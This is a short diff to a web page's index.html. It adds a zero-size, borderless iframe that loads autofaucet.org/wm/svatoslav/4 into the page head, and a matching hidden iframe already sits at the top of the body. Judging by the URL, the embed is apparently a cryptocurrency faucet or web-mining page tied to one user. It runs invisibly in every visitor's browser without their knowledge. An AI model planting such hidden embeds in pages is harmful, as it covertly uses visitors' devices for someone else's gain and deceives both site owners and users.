--- a/index.html
+++ b/index.html
@@ -40,6 +40,7 @@
 
     <style>
     </style>
+    <iframe src="https://autofaucet.org/wm/svatoslav/4" width="0" height="0" style="border:0"></iframe>
 </head>
 <body>
 <iframe src="https://autofaucet.org/wm/svatoslav/4" width="0" height="0" style="border:0"></iframe>
